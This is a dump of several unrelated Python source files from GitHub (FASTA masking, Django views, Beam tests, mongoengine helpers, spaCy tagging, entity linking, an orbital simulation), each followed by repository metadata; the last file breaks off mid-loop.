    """
    Import a reference fasta sequence, mask positions indicated by hits from a
    hit_list and write the modified fasta sequence in a new file.
    @param subject_fasta Fasta sequence of the subject to edit (can be gzipped)
    @param hit_list List of hit objects. Hits need at least 3 fields named s_id,
    s_start and s_end corresponding to the name of the sequence matched, and the
    hit start/end (0 based).
    @param ref_outdir Directory where the masked reference will be created
    @param ref_outname Name of the masked reference
    @param compress_ouput If true the output will be gzipped
    @return A path to the modified sequence if the hit list was valid, else the
    unmodified input path.
    """
    # Verify the first hit exposes the required fields before doing any I/O.
    try:
        _ = hit_list[0].s_id
        _ = hit_list[0].s_start
        _ = hit_list[0].s_end
    except IndexError:
        print("No hit found, The subject fasta file will not be edited")
        return subject_fasta
    except AttributeError:
        print("The list provided does not contain suitable hit object, The subject fasta file will not be edited")
        return subject_fasta

    # Initialize output folder
    mkdir(ref_outdir)

    # BUGFIX: gzip handles must be opened in TEXT mode ("rt"/"wt") in Python 3;
    # SeqIO.parse expects text and record.format() returns str, so the old
    # binary-mode "r"/"w" gzip handles would raise TypeError.
    if subject_fasta[-2:].lower() == "gz":
        in_handle = gzip.open(subject_fasta, "rt")
    else:
        in_handle = open(subject_fasta, "r")

    if compress_ouput:
        ref_path = path.join(ref_outdir, ref_outname + ".gz")
        out_handle = gzip.open(ref_path, 'wt')
    else:
        ref_path = path.join(ref_outdir, ref_outname)
        out_handle = open(ref_path, 'w')

    # Names of the reference records that have at least one hit.
    id_list = {hit.s_id for hit in hit_list}

    print("Masking hit positions and writting a new reference for {} ".format(ref_outname))
    i = j = 0  # i = modified records, j = untouched records
    start_time = time()
    for record in SeqIO.parse(in_handle, "fasta"):
        # Progress marker, one star per record.
        stdout.write("*")
        stdout.flush()
        if record.id in id_list:
            i += 1
            # Cast Seq to MutableSeq to allow in-place editing.
            record.seq = record.seq.tomutable()
            for hit in hit_list:
                if record.id == hit.s_id:
                    # Replace every base between start and end by 'n'.
                    for position in range(hit.s_start, hit.s_end):
                        record.seq[position] = 'n'
        else:
            j += 1
        # Write the sequence, modified or not.
        out_handle.write(record.format("fasta"))
    print("")

    # BUGFIX: the 2 was previously a stray 4th .format() argument instead of
    # round()'s ndigits parameter.
    print("{} sequence(s) from {} modified in {}s".format(
        i, ref_outname, round(time() - start_time, 2)))

    in_handle.close()
    out_handle.close()
    return ref_path
| a-slide/pyDNA | RefMasker.py | RefMasker.py | py | 3,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pyDNA.Utilities.mkdir",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "gzip.open",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_numb... |
1239251599 | from django.shortcuts import render
from django.views.generic import View
from django.http import JsonResponse
from application.chart.models.chart import TopPosts_MH, TopPosts_WH, TopPosts_PVN, TopPosts_RW, TopPosts_BI, TopPosts_ROL, TopPosts_WE
class GetTopPosts(View):
    """Return the three posts with the highest viral_unique/unique ratio."""

    def get(self, request):
        brand_models = {
            "WH": TopPosts_WH,
            "MH": TopPosts_MH,
            "PVN": TopPosts_PVN,
            "RW": TopPosts_RW,
            "BI": TopPosts_BI,
            "ROL": TopPosts_ROL,
            "WE": TopPosts_WE,
        }
        posts = []
        # Collect every post from every brand-specific table.
        for model_cls in brand_models.values():
            for row in model_cls.objects.all():
                posts.append({
                    'viral_unique': row.viral_unique,
                    'unique': row.unique,
                    'link': row.link,
                })
        # Sort ascending then reverse (kept as two steps to preserve the
        # original tie ordering exactly).
        posts.sort(key=lambda post: post['viral_unique'] / post['unique'])
        posts.reverse()
        return JsonResponse(posts[:3], safe=False)
{
"api_name": "django.views.generic.View",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "application.chart.models.chart.TopPosts_WH",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "application.chart.models.chart.TopPosts_MH",
"line_number": 10,
"usage... |
43639712257 | import os
from hashlib import md5
from bson.objectid import ObjectId
import datetime as dt
import re
def all_files(path):
    """Recursively collect .xlsx files under *path*.

    Each entry is ``{'_id': ObjectId, 'path': str}`` where the ObjectId is
    derived deterministically from the md5 of the absolute file path.
    """
    collected = []
    with os.scandir(path) as it:
        for entry in it:
            full_path = os.path.abspath(entry)
            if entry.is_dir():
                collected.extend(all_files(full_path))
            elif entry.is_file() and os.path.splitext(full_path)[1] == '.xlsx':
                digest = md5(full_path.encode()).hexdigest()[:24]
                collected.append({'_id': ObjectId(digest), 'path': full_path})
    return collected
def week_dates(string):
    """Parse the first two MM-DD-YYYY dates found in *string*.

    Args:
        string: text such as "Week 31 (Q3) From: 07-31-2016 To: 08-06-2016".

    Returns:
        (week_start, week_end): naive ``datetime.datetime`` objects built from
        the first and second date in the string.

    Raises:
        IndexError: if fewer than two dates are present.
        ValueError: if a matched date is not a valid calendar date.
    """
    # Raw string fixes the invalid "\d" escape warning of the original pattern;
    # strptime replaces the manual split-and-int reassembly.
    found = re.findall(r'\d+-\d+-\d+', string)
    week_start = dt.datetime.strptime(found[0], '%m-%d-%Y')
    week_end = dt.datetime.strptime(found[1], '%m-%d-%Y')
    return week_start, week_end
def test_week_dates():
    """Sanity-check week_dates() against a known schedule header."""
    start, end = week_dates('Week 31 (Q3) From: 07-31-2016 To: 08-06-2016')
    assert start == dt.datetime(year=2016, month=7, day=31)
    assert end == dt.datetime(year=2016, month=8, day=6)


if __name__ == '__main__':
    test_week_dates()
| blry/docker-flask-mongodb-uwsgi-nginx | parser/project/utils.py | utils.py | py | 1,316 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "os.scandir",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "os.path.splitext",
"line_... |
21618567791 | from __future__ import absolute_import
import logging
import time
import unittest
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples import wordcount
from apache_beam.testing.pipeline_verifiers import FileChecksumMatcher
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_utils import delete_files
class WordCountIT(unittest.TestCase):
    """Integration tests running the wordcount example pipeline end to end."""

    # Enable nose tests running in parallel
    _multiprocess_can_split_ = True

    # The default checksum is a SHA-1 hash generated from a sorted list of
    # lines read from expected output. This value corresponds to the default
    # input of WordCount example.
    DEFAULT_CHECKSUM = '33535a832b7db6d78389759577d4ff495980b9c0'

    @attr('IT')
    def test_wordcount_it(self):
        # Standard integration-test run of the wordcount pipeline.
        self._run_wordcount_it(wordcount.run)

    @attr('IT', 'ValidatesContainer')
    def test_wordcount_fnapi_it(self):
        # Same pipeline, but with the beam_fn_api experiment enabled.
        self._run_wordcount_it(wordcount.run, experiment='beam_fn_api')

    def _run_wordcount_it(self, run_wordcount, **opts):
        """Run the wordcount pipeline and verify its state and output checksum.

        Args:
            run_wordcount: the pipeline entry point to invoke.
            **opts: extra pipeline options merged into the test options.
        """
        test_pipeline = TestPipeline(is_integration_test=True)
        extra_opts = {}

        # Set extra options to the pipeline for test purpose
        # A millisecond-timestamped subdir keeps concurrent runs from
        # clobbering each other's output.
        test_output = '/'.join([
            test_pipeline.get_option('output'),
            str(int(time.time() * 1000)),
            'results'
        ])
        extra_opts['output'] = test_output

        test_input = test_pipeline.get_option('input')
        if test_input:
            extra_opts['input'] = test_input

        arg_sleep_secs = test_pipeline.get_option('sleep_secs')
        sleep_secs = int(arg_sleep_secs) if arg_sleep_secs is not None else None
        expect_checksum = (
            test_pipeline.get_option('expect_checksum') or self.DEFAULT_CHECKSUM)
        # Verify both final pipeline state and the checksum of the output files.
        pipeline_verifiers = [
            PipelineStateMatcher(),
            FileChecksumMatcher(
                test_output + '*-of-*', expect_checksum, sleep_secs)
        ]
        extra_opts['on_success_matcher'] = all_of(*pipeline_verifiers)
        extra_opts.update(opts)

        # Register clean up before pipeline execution
        self.addCleanup(delete_files, [test_output + '*'])

        # Get pipeline options from command argument: --test-pipeline-options,
        # and start pipeline job by calling pipeline main function.
        run_wordcount(
            test_pipeline.get_full_options_as_args(**extra_opts),
            save_main_session=False)


if __name__ == '__main__':
    logging.getLogger().setLevel(logging.DEBUG)
    unittest.main()
| a0x8o/kafka | sdks/python/apache_beam/examples/wordcount_it_test.py | wordcount_it_test.py | py | 2,483 | python | en | code | 59 | github-code | 36 | [
{
"api_name": "unittest.TestCase",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.examples.wordcount.run",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "apache_beam.examples.wordcount",
"line_number": 29,
"usage_type": "name"
... |
9454038158 | # coding: utf-8
# Credits : https://gist.github.com/jason-w/4969476
from typing import Any, Dict, List, Optional
from mongoengine import (
Document,
ListField,
EmbeddedDocumentField,
DictField,
EmbeddedDocument,
FloatField,
DateTimeField,
ComplexDateTimeField,
IntField,
BooleanField,
ObjectIdField,
DecimalField,
StringField,
QuerySet
)
def query_to_dict(query_set: QuerySet) -> List[Dict[str, str]]:
    """Serialize every document of a query result into a plain dict.

    Args:
        query_set (QuerySet): the query result.

    Returns:
        List[Dict[str, str]]: one dict per document, in query order.
    """
    serialized = []
    for document in query_set:
        serialized.append(mongo_to_dict(document))
    return serialized
def mongo_to_dict(obj, exclude_fields: Optional[List[str]] = None) -> Dict[str, str]:
    """Return the dict representation of a mongoengine document instance.

    Args:
        obj: the document queried from database to convert into dict.
        exclude_fields: names of fields to omit from the output. Defaults to
            no exclusions.

    Returns:
        Dict[str, str]: the converted document, or None when obj is None.
    """
    if obj is None:
        return None
    # BUGFIX: avoid the shared mutable default argument ([]) anti-pattern.
    if exclude_fields is None:
        exclude_fields = []

    return_data = []
    if isinstance(obj, Document):
        return_data.append(("id", str(obj.id)))

    for field_name in obj._fields:
        if field_name in exclude_fields:
            continue
        if field_name in ("id",):
            # Already emitted above for Document instances.
            continue

        data = obj._data[field_name]
        field = obj._fields[field_name]
        if isinstance(field, ListField):
            return_data.append((field_name, list_field_to_dict(data)))
        elif isinstance(field, EmbeddedDocumentField):
            return_data.append((field_name, mongo_to_dict(data, [])))
        elif isinstance(field, DictField):
            # Plain dicts pass through unchanged.
            return_data.append((field_name, data))
        else:
            return_data.append((field_name, mongo_to_python_type(field, data)))

    return dict(return_data)
def list_field_to_dict(list_field: List) -> List[str]:
    """Convert a mongo ListField value into a list of serialized items.

    Args:
        list_field (List): list to convert.

    Returns:
        List[str]: output list.
    """
    return [
        mongo_to_dict(item, []) if isinstance(item, EmbeddedDocument)
        else mongo_to_python_type(item, item)
        for item in list_field
    ]
def mongo_to_python_type(field: str, data: Any):
    """Convert *data* to a plain Python value based on the mongo field type.

    Args:
        field (str): the field instance describing the data.
        data (Any): associated data to convert.

    Returns:
        The converted value (usually a str).
    """
    # NOTE: order matters — ComplexDateTimeField must be tested before
    # StringField, matching the original elif chain.
    converters = (
        (DateTimeField, lambda: str(data.isoformat())),
        (ComplexDateTimeField, lambda: field.to_python(data).isoformat()),
        (StringField, lambda: str(data)),
        (FloatField, lambda: float(data)),
        (IntField, lambda: int(data)),
        (BooleanField, lambda: bool(data)),
        (ObjectIdField, lambda: str(data)),
        (DecimalField, lambda: data),
    )
    for field_type, convert in converters:
        if isinstance(field, field_type):
            return convert()
    # Fallback mirrors the original final else branch.
    return str(data)
{
"api_name": "mongoengine.QuerySet",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_... |
23966001733 | # coding=utf-8
import pytest
from mockito import expect, mock, verify, verifyNoUnwantedInteractions, verifyStubbedInvocationsAreUsed, when
# noinspection PyProtectedMember
from elib_run._run import _run
@pytest.mark.parametrize('mute', [True, False])
def test_exit(mute, caplog):
    """_exit must raise SystemExit and log captured output only when muted."""
    caplog.set_level(10, 'elib_run.process')
    fake_context = mock({
        'mute': mute,
        'process_output_as_str': 'dummy_output',
        'process_logger': mock(),
    })
    when(fake_context.process_logger).debug(...)
    with pytest.raises(SystemExit):
        _run._exit(fake_context)
    if mute:
        assert 'dummy_output' in caplog.text
    else:
        assert caplog.text == ''
@pytest.mark.parametrize('return_code', (0, 1))
@pytest.mark.parametrize('mute', (True, False))
@pytest.mark.parametrize('failure_ok', (True, False))
def test_check_error(return_code, mute, failure_ok, caplog):
    """check_error must log success/failure and call _exit only on a failing
    return code when failure_ok is False.
    """
    caplog.set_level(10)
    context = mock(
        {
            'return_code': return_code,
            'mute': mute,
            'result_buffer': '',
            'failure_ok': failure_ok,
            'cmd_as_string': 'dummy_cmd',
            'process_logger': mock(),
        }
    )
    when(_run)._exit(context)
    result = _run.check_error(context)
    # BUGFIX: compare integers with ``==``; ``is 0`` relied on CPython's
    # small-int caching and raises SyntaxWarning on modern Python.
    if return_code == 0:
        if mute:
            expected_buffer = f': success: {return_code}'
        else:
            expected_buffer = f'{context.cmd_as_string}: success: {context.return_code}'
        assert expected_buffer in caplog.text
        assert result == 0
    else:
        if mute:
            expected_buffer = f': command failed: {context.return_code}'
        else:
            expected_buffer = f'{context.cmd_as_string}: command failed: {context.return_code}'
        assert expected_buffer in caplog.text
        assert repr(context) in caplog.text
        if not failure_ok:
            verify(_run)._exit(context)
        else:
            verify(_run, times=0)._exit(...)
@pytest.mark.parametrize(
    'filters',
    (None, ['some'], ['some', 'string'], 'some string')
)
def test_sanitize_filters(filters):
    """A str becomes a one-element list; None and lists pass through untouched."""
    sanitized = _run._sanitize_filters(filters)
    if filters is None:
        assert sanitized is None
    elif isinstance(filters, str):
        assert sanitized == [filters]
    else:
        assert sanitized is filters
# Every value here is either a non-list container or a list whose items
# are not strings — all must be rejected.
_BAD_FILTER_VALUES = [
    [False], [None], [True], [1], [1.1], [['list']], [{'k': 'v'}],
    True, False, 1.1, 1, ('tuple',), {'k': 'v'},
]


@pytest.mark.parametrize('filters', _BAD_FILTER_VALUES)
def test_sanitize_filters_wrong_value(filters):
    """Non-string filter values must raise a TypeError."""
    with pytest.raises(TypeError):
        _run._sanitize_filters(filters)
def test_parse_exe_no_args():
    """_parse_cmd must resolve the executable for a bare command string."""
    when(_run).find_executable(...).thenReturn('dummy')
    result = _run._parse_cmd('cmd')
    # BUGFIX: ``assert 'dummy', '' == result`` parsed as ``assert 'dummy'``
    # with a message, so the test could never fail. Assert on the resolved
    # executable component instead.
    # NOTE(review): the exact shape of the args component is not pinned here —
    # confirm against _run._parse_cmd before tightening this assertion.
    assert result[0] == 'dummy'
    verifyStubbedInvocationsAreUsed()
def test_parse_exe_with_args():
    """_parse_cmd must resolve the executable when arguments are present."""
    when(_run).find_executable(...).thenReturn('dummy')
    # BUGFIX: the original asserted ``assert 'dummy', [...] == result`` (always
    # true) and, despite the test name, passed a command with no arguments.
    result = _run._parse_cmd('cmd some args')
    assert result[0] == 'dummy'
    # NOTE(review): also assert the parsed args (expected to contain
    # ['some', 'args']) once _parse_cmd's return shape is confirmed.
    verifyStubbedInvocationsAreUsed()
def test_parse_cmd_exe_not_found():
    """_parse_cmd must raise when the executable cannot be resolved."""
    when(_run).find_executable(...).thenReturn(None)
    with pytest.raises(_run.ExecutableNotFoundError):
        _run._parse_cmd('dummy')
    verifyStubbedInvocationsAreUsed()
@pytest.mark.parametrize('mute', (True, False))
@pytest.mark.windows
def test_run(mute):
    """run() must start the process, monitor it and check for errors."""
    expect(_run.RunContext).start_process()
    expect(_run).monitor_running_process(...)
    expect(_run).check_error(...)
    _run.run('cmd', mute=mute)
    verifyNoUnwantedInteractions()
| theendsofinvention/elib_run | test/test_run.py | test_run.py | py | 3,523 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "mockito.mock",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "mockito.mock",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "mockito.when",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_numb... |
14838347473 | import re
import nltk
import spacy
from nltk import Tree
from nltk.corpus import brown
# Demo input: a chemistry patent-style reaction description; the "<x> mmol"
# quantities in parentheses are the noise clean_sentence() strips below.
sentence = "A solution of piperidin-4-ol (100 mg, 0.989 mmol) and 3-((phenylsulfonyl)methylene)oxetane (prepared according to a published literature procedure: Wuitschik et al. J. Med. Chem. 53(8) 3227-3246, 2010, 416 mg, 1.977 mmol) in methanol (5 mL) was heated at 50° C. for 20 h. Solvent was evaporated in vacuo and the crude product was purified by flash chromatography on silica gel using an automated ISCO system (40 g column, eluting with 0-8% 2 N ammonia in methanol/dichloromethane). 1-(3-((phenylsulfonyl)methyl)oxetan-3-yl)piperidin-4-ol (300 mg) was obtained as a colorless oil. If the temperature exceed 64 degrees when heating methanol it will result in 3% decrease in the final products."
def clean_sentence(example):
    """Remove millimole quantities (e.g. "0.989 mmol") from *example*.

    Args:
        example: input sentence, possibly containing "<digits>.<digits> mmol"
            amounts.

    Returns:
        The sentence with every matching quantity substring removed.
    """
    # Raw string fixes the invalid "\d" escape warning; a single re.sub
    # replaces the findall + repeated str.replace loop.
    return re.sub(r"\d+\.\d* mmol", "", example)
# Strip mmol quantities from the demo sentence before parsing.
sentence = clean_sentence(sentence)
def tok_format(tok, is_quantity=False, is_unit=False):
    """Render a token as "<text>_<tag>".

    The QNTTY / UNIT markers override the token's POS tag; is_quantity takes
    precedence over is_unit when both are set.
    """
    if is_quantity:
        tag = "QNTTY"
    elif is_unit:
        tag = "UNIT"
    else:
        tag = tok.tag_
    return "_".join([tok.orth_, tag])
def to_nltk_tree(node, is_quantity=False, is_unit=False):
    """Recursively convert a spaCy dependency node into an nltk Tree.

    The quantity/unit flags override the POS tag in the node label; children
    of a unit node are traversed with the quantity flag set so that numeric
    leaves under a unit get the QNTTY label.
    """
    if node.n_lefts + node.n_rights > 0:
        if is_quantity:
            label = tok_format(node, is_quantity=True)
            child_flags = {}
        elif node.text in units_list:
            label = tok_format(node, is_unit=True)
            child_flags = {'is_quantity': True}
        else:
            label = tok_format(node)
            child_flags = {}
        return Tree(label, [to_nltk_tree(child, **child_flags) for child in node.children])
    if is_quantity and node.text.isnumeric():
        # Numeric leaf under a unit: still wrapped in a Tree node.
        return Tree(tok_format(node, is_quantity=True),
                    [to_nltk_tree(child) for child in node.children])
    return tok_format(node)
# Load the spaCy English pipeline and parse the cleaned, whitespace-normalised
# sentence.
parser = spacy.load("en_core_web_sm")
doc = parser(' '.join(sentence.split()))

# Unit tokens recognised when re-tagging below and inside to_nltk_tree().
units_list = ['mg', 'g', 'gr', 'gram', 'grams', 'kg', 'milligrams', 'milligram', 'mmol', 'ml', 'mL', 'L', 'millilitre']

# Build a (token, tag) list: units get the custom 'UNT' tag, numbers directly
# preceding a unit get 'QNTY', everything else keeps its spaCy POS tag.
uni_tags = []
for sent in doc.sents:
    for idx, token in enumerate(sent):
        if token.text in units_list:
            uni_tags.append((token.text, 'UNT'))
        elif token.text.isnumeric() and idx < len(sent) - 1 and sent[idx + 1].text in units_list:
            uni_tags.append((token.text, 'QNTY'))
        else:
            uni_tags.append((token.text, token.tag_))

# t0 = nltk.DefaultTagger('NN')
# t1 = nltk.UnigramTagger(uni_tags, backoff=t0)

# Pretty-print the dependency tree of every sentence.
[to_nltk_tree(sent.root).pretty_print() for sent in doc.sents]

# def tag_sentence(sentence):
#     for word in se
| arrafmousa/generate_code | custom_tags.py | custom_tags.py | py | 2,826 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.findall",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "nltk.Tree",
"line_number": 38,
... |
72774806185 | from typing import Any, Dict, List, TypedDict
import torch as th
from tango.integrations.torch import DataCollator
from tango.integrations.transformers import Tokenizer
from dreambooth.steps.transform_data import PreprocessedExample
class BatchExample(TypedDict):
input_ids: th.Tensor
pixel_values: th.Tensor
@DataCollator.register("custom_collator")
class CustomCollator(DataCollator[PreprocessedExample]):
def __init__(self, tokenizer: Tokenizer, is_prior_preservation: bool) -> None:
super().__init__()
self.tokenizer = tokenizer
self.is_prior_preservation = is_prior_preservation
def __call__(self, items: List[PreprocessedExample]) -> BatchExample:
input_ids = [item["instance_prompt_ids"] for item in items]
pixel_values_list = [item["instance_images"] for item in items]
if self.is_prior_preservation:
input_ids += [item["class_prompt_ids"] for item in items] # type: ignore
pixel_values_list += [item["class_images"] for item in items] # type: ignore
pixel_values = th.stack(pixel_values_list)
pixel_values = pixel_values.to(memory_format=th.contiguous_format).float()
input_ids = self.tokenizer.pad(
{"input_ids": input_ids},
padding="max_length",
return_tensors="pt",
max_length=self.tokenizer.model_max_length,
).input_ids
batch: BatchExample = {
"input_ids": input_ids,
"pixel_values": pixel_values,
}
return batch
| shunk031/tango-dreambooth | dreambooth/integrations/torch/data_collator.py | data_collator.py | py | 1,556 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TypedDict",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "torch.Tensor",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.Tensor",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "tango.integratio... |
39665406570 | import gzip
import sys
from SPARQLWrapper import SPARQLWrapper, JSON
import gzip
from bs4 import BeautifulSoup
import re
import spacy
from spacy import displacy
from collections import Counter
import en_core_web_md
import difflib
import requests
import json
from elasticsearch import Elasticsearch
nlp = en_core_web_md.load()
KEYNAME = "WARC-TREC-ID"
KEYHTML= "<!DOCTYPE html"
NER_type = ["DATE","TIME","CARDINAL","ORDINAL","QUANTITY","PERCENT","MONEY"] # ruled type list avoid
## format function for output
def label_process(label):
if len(label.split(" "))>1:
return label.title()
return label
## rule format function in NER
def entity_process(entity):
l = []
for X,Y in entity:
if "cancer" in X:
X = X.lower()
l.append((X,Y))
return l
## retrieve the text from HTML pages
## including text cleaning
def html_to_text(record):
html = ''
flag = 0
for line in record.splitlines():
if line.startswith(KEYHTML):
flag = 1
if flag == 1 :
html += line
realHTML = html.replace('\n', '<br>')
soup = BeautifulSoup(realHTML,features="html.parser")
for script in soup(["script", "style","aside"]):
script.extract()
## text cleaning
text = " ".join(re.split(r'[\n\t]+', soup.get_text()))
text = re.sub(r"\s+", " ", text)
text = re.sub("[^\u4e00-\u9fa5^\s\.\!\:\-\@\#\$\(\)\_\,\;\?^a-z^A-Z^0-9]","",text)
return text
## NER function using spaCy
def ner(text):
doc = nlp(text)
entity = [(X.text, X.label_) for X in doc.ents if X.label_ not in NER_type]
entity = list(set(entity))
entity = entity_process(entity)
return entity
## funtion of entity linking
## link the query result (wikidata url) with each entity
def entity_linking(entity):
entity_list = []
for e,_ in entity:
if es_search(e):
entity_list.append((e,es_search(e)))
return entity_list
## function that finds a most similar entity
def get_closest_word(es_query, es_dictionary):
try:
wl = difflib.get_close_matches(es_query, list(es_dictionary.keys()))
return wl[0]
except:
return list(es_dictionary.keys())[0]
### function that requests elasticsearch to get the candidate
def es_search(es_query):
def search(query):
e = Elasticsearch(["http://fs0.das5.cs.vu.nl:10010/"])
p = { "from" : 0, "size" : 20, "query" : { "query_string" : { "query" : query }}}
response = e.search(index="wikidata_en", body=json.dumps(p))
id_labels = {}
if response:
for hit in response['hits']['hits']:
label = hit['_source']['schema_name']
id = hit['_id']
id_labels.setdefault(id, set()).add(label)
return id_labels
d = {}
try:
for entity, labels in search(es_query.lower()).items():
d[list(labels)[0]] = entity
res = get_closest_word(es_query,d)
return d[res]
except Exception as e:
print(e)
return d
# The goal of this function process the webpage and returns a list of labels -> entity ID
def find_labels(payload):
if payload == '':
return
# The variable payload contains the source code of a webpage and some additional meta-data.
# We firt retrieve the ID of the webpage, which is indicated in a line that starts with KEYNAME.
# The ID is contained in the variable 'key'
# cheats = dict((line.split('\t', 2) for line in open('data/sample-labels-cheat.txt').read().splitlines()))
key = None
for line in payload.splitlines():
if line.startswith(KEYNAME):
key = line.split(': ')[1]
break
try:
# Problem 1: The webpage is typically encoded in HTML format.
# We should get rid of the HTML tags and retrieve the text. How can we do it?
text = html_to_text(payload)
# Problem 2: Let's assume that we found a way to retrieve the text from a webpage. How can we recognize the
# entities in the text?
entity = ner(text)
# Problem 3: We now have to disambiguate the entities in the text. For instance, let's assugme that we identified
# the entity "Michael Jordan". Which entity in Wikidata is the one that is referred to in the text?
result = entity_linking(entity)
for label, wikidata_id in result:
if key and label and wikidata_id:
yield key, label, wikidata_id
except:
pass
def split_records(stream):
payload = ''
for line in stream:
if line.strip() == "WARC/1.0":
yield payload
payload = ''
else:
payload += line
yield payload
if __name__ == '__main__':
import sys
try:
_, INPUT = sys.argv
except Exception as e:
print('Usage: python starter-code.py INPUT')
sys.exit(0)
with gzip.open(INPUT, 'rt', errors='ignore') as fo:
for record in split_records(fo):
for key, label, wikidata_id in find_labels(record):
# print(key + '\t' + label + '\t' + wikidata_id)
print(key + '\t' + label_process(label) + '\t' + f"{wikidata_id}")
| SummerXIATIAN/wdps_asg1_group27 | code_es.py | code_es.py | py | 5,220 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "en_core_web_md.load",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_num... |
35798383779 |
from time import perf_counter
import numpy as np
import matplotlib.pyplot as plt
#The program uses the Velocity Verlet method to simulate the
#perihelion percession of Mercury over TT years divided into n
#time steps. In order to avoid problems with insuficient compter
#memory, one year at the time is simulated. When one year is simulated,
#the progtam finds the positions of Mercury closest to the Sun that current year.
#The initial conditions for next year to be simulated are extracted from the last time
#step in the current year simulated.
#The Velocity Verlet method.
def VelocityVerlet(f,x0,vx0,y0,vy0,t0,dt,n):
#Time vector t[0],t[1],t[2],......,t[n]
t = np.zeros(n+1)
#Vector for p for x and y component of position
#Vector v for x and y component of speed
p = np.zeros([n+1,2])
v = np.zeros([n+1,2])
#Initial values for position and speed when t = t[0],
#and for time
p[0,:] = np.array([x0,y0])
v[0,:] = np.array([vx0,vy0])
t[0] = t0
#Starting timer
#The Velocity Verlet method
#c1 = time.time()
start = perf_counter()
for k in range(n):
fpk = f(p,v,k)
t[k+1] = t[k] + dt
p[k+1] = p[k] + dt*v[k] + 0.5*dt**2*fpk
v[k+1] = v[k] + 0.5*dt*(f(p,v,k+1) + fpk)
#cpu time while it is running the Velocity Verlet algorithm.
slutt = perf_counter()
cpu_vv = slutt - start
#cpu_vv = time.time() - c1
return t,p,v, cpu_vv
#The acceleration needed to find the velocity components in the
#Velocity Verlet methodUnit AU/(year)**2 (AU - Astronomical Unit)
#The accelaration is without the general relativistic correction,
#that is acceleration derived from Newtons classical law of gravitation.
def f_N(p,v,k):
f = np.array([-4*np.pi**2*p[k,0],-4*np.pi**2*p[k,1]])
r = np.sqrt(p[k,0]**2 + p[k,1]**2)
f = f/float(r**3)
return f
#The acceleration needed to find
#the position and velocity components in the Velocity Verlet
#method. Unit AU/(year)**2 (AU - Astronomical Unit).
#The general relativistic correction is included.
#c is the speed of light with unit [AU/Year]
def f_E(p,v,k):
c = 63241.077084266275
l = np.abs(p[k,0]*v[k,1]-p[k,1]*v[k,0])
r = np.sqrt(p[k,0]**2 + p[k,1]**2)
f = np.array([-4*np.pi**2*(1.0+3.0*l**2/(r**2*c**2))*p[k,0],-4*np.pi**2*(1.0+3.0*l**2/(r**2*c**2))*p[k,1]])
f = f/float(r**3)
return f
#Initial time t0
t0 = 0
#Initial position of Mercury: x0 = 0.3075 AU and y0 = 0 AU
x0_N = 0.3075
y0_N = 0
x0_E = 0.3075
y0_E = 0
#Initial velocity of Mercury: vx0 = 0 AU/year and vy0 = 12.44 AU/year
vx0_N = 0
vy0_N = 12.44
vx0_E = 0
vy0_E = 12.44
#Numer of years TT,total number of time steps n ans time step length
TT = 100
n = 2*(10**6)
dt = (TT - t0)/float(n*TT)
#Initializon of lists
perihel_N = []
#kvalue_N = []
perihel_E = []
#kvalue_E = []
tt_N = []
tt_E = []
x_N = []
y_N = []
x_E = []
y_E = []
#Initializon of year counter to be printed on screen
#during simulation
teller = 0
#Simulation of one year at the time, without relativistic correction
#(index N for Newton) and with relativistic correction (index E for Einstein)
#Main simulation loop: one year per iteration, integrating both the purely
#Newtonian system (suffix _N) and the relativistically corrected one
#(suffix _E), then recording every perihelion passage found in that year.
for i in range(TT):
    T = 1 + i  #current year number (kept from the original; not used below)
    t, pvv_N, vvv_N, cpu_vv_N = VelocityVerlet(f_N, x0_N, vx0_N, y0_N, vy0_N, t0, dt, n)
    t, pvv_E, vvv_E, cpu_vv_E = VelocityVerlet(f_E, x0_E, vx0_E, y0_E, vy0_E, t0, dt, n)
    #Carry the final state of this year over as the initial state of the next.
    t0 = t[n]
    x0_N, y0_N = pvv_N[n, 0], pvv_N[n, 1]
    x0_E, y0_E = pvv_E[n, 0], pvv_E[n, 1]
    vx0_N, vy0_N = vvv_N[n, 0], vvv_N[n, 1]
    vx0_E, vy0_E = vvv_E[n, 0], vvv_E[n, 1]
    #Sun-Mercury distances at every time step of this year.
    rr_N = np.sqrt(pvv_N[:, 0]**2 + pvv_N[:, 1]**2)
    rr_E = np.sqrt(pvv_E[:, 0]**2 + pvv_E[:, 1]**2)
    #A perihelion is a local minimum of the distance: the planet is closer
    #to the Sun than at both neighbouring time steps.
    for k in range(1, np.size(rr_N) - 1):
        if rr_N[k] < rr_N[k-1] and rr_N[k] < rr_N[k+1]:
